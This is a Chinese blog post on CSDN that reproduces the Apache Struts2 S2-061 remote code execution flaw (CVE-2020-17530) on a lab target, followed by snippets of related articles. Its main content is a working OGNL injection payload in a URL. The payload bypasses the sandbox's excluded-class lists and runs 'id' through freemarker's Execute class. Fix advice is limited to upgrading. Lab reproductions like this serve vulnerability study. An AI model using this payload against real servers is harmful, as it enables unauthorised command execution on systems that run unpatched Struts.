Struts2 S2-061 远程代码执行漏洞 (CVE-2020-17530)

最新推荐文章于 2024-07-16 08:25:53 发布
最新推荐文章于 2024-07-16 08:25:53 发布
阅读量411 收藏 1
点赞数
文章标签: struts apache java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123361461
版权

漏洞简介

Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。

影响版本

Apache Struts 2.0.0 - 2.5.25

漏洞复现

搭建靶场,并访问

验证漏洞是否存在

http://47.106.102.84:31924/?id=%25%7b+%27test%27+%2b+(2000+%2b+20).toString()%7d

执行成功 

 

 查看id

http://47.106.102.84:31924/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27id%27}).(%23res%3d%23exec.exec(%23cmd))}

 

修复建议

将Apache struts框架升级至最新版本

Z_l123
关注
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1128
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
Struts2 S2-059 远程代码执行漏洞CVE-2019-0230 )复现
玄道的网安博客
10-28 1956
简介 Struts2是一个基于MVC设计模式的Web应用框架 影响版本 Struts 2.0.0 – Struts 2.5.20 环境搭建 使用vulhub快速搭建 https://github.com/vulhub/vulhub 进入目录 cd vulhub-master/struts2/s2-059 docker安装 docker-compose up -d 启动环境之后访问http://your-ip:8080/?id=1就可以看到测试界面 漏洞...
Struts2 S2-061 远程命令执行漏洞CVE-2020-17530)复现
玄道的网安博客
12-11 7102
漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。 影响版本 Apache Struts 2.0.0 - 2.5.25 环境搭建 这里使用docker进行安装 项目地址: https://github....
struts2漏洞_【更新】Apache Struts2 远程代码执行漏洞(CVE202017530)
weixin_39897127的博客
12-16 661
漏洞名称:Apache Struts2远程代码执行漏洞(CVE-2020-17530)威胁等级:高危影响范围:Apache Struts 2.0.0 - 2.5.25漏洞类型:远程代码执行利用难度: 中等漏洞分析1Apache Struts2 组件介绍Struts2是一个基于MVC设计模式的Web应用框架。在MVC设计模式中,Struts2作为控制器(Contro...
struts2 代码执行CVE-2020-17530
最新发布
qq_23003811的博客
07-16 144
此次漏洞只是S2-059修复的一个绕过,并且本次利用的核心类org.apache.commons.collections.BeanMap在commons-collections-x.x.jar包中,但是在官方的最小依赖包中并没有包含这个包。所以即使扫到了支持OGNL表达式的注入点,但是如果没有使用这个依赖包,也还是没办法进行利用。,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性中使用了。三、验证方式,查看页面源码如果计算公式88+12执行说明存在漏洞。的值用户可控时,用户再传入一个。
Struts2 S2-061 远程命令执行漏洞CVE-2020-17530漏洞复现
sechelper的博客
01-11 692
cve漏洞详细复现,漏洞利用,反弹shell,工具分享
【vulhub】Struts2 S2-061 远程命令执行漏洞CVE-2020-17530
weixin_42884199的博客
12-07 446
前言 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload %25{(223*223)} view-source:http://192.168.150.146:8080/index.action?id=%25{(223*223)} 访
Struts2 S2-061 远程命令执行漏洞CVE-2020-17530
qq_68163788的博客
06-25 461
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
Struts2远程命令执行验证工具
11-22
Struts2漏洞检查工具,可快速检测struts命令执行漏洞,支持批量导入验证,存在可利用的漏洞后,可远程执行命令及文件上传等操作。方便管理人员了解其危害。
struts2 代码执行CVE-2020-17530s2-061
YouthBelief的博客
11-07 673
struts2 代码执行CVE-2020-17530struts2 代码执行CVE-2020-17530)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 struts2 代码执行CVE-2020-17530Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 在特定的环境下,远程攻击者通过构造 恶意的OGNL表达式 ,可造成 任意代
漏洞复现】6.Struts2 S2-061 远程命令执行漏洞CVE-2020-17530)复现与分析
Zichel77的博客
03-21 1486
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
Struts2 S2-061 远程命令执行漏洞CVE-2020-17530)
weixin_70045024的博客
09-11 1218
Struts2 S2-061 远程命令执行漏洞CVE-2020-17530)
Struts2 远程代码执行漏洞复现(S2-001)
Welcome To Myon'Blog !
03-14 1231
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
struts2/s2-061(vulhub复现)
qq_40646572的博客
10-31 999
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。S2-061是对S2-059沙盒进行的绕过。
Struts2 S2-061(CVE-2020-17530)漏洞复现
qq_56258713的博客
07-03 1398
Struts2 S2-061(CVE-2020-17530)漏洞复现
Struts2 S2-061 漏洞分析:OGNL表达式注入与远程代码执行
"Apache Struts2S2-061 漏洞是一个严重的远程代码执行漏洞,出现在使用特定tag时的OGNL表达式注入。该漏洞2020年12月8日被公开,允许攻击者通过构造恶意输入来绕过OGNL沙盒限制,执行任意代码。在分析Poc时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值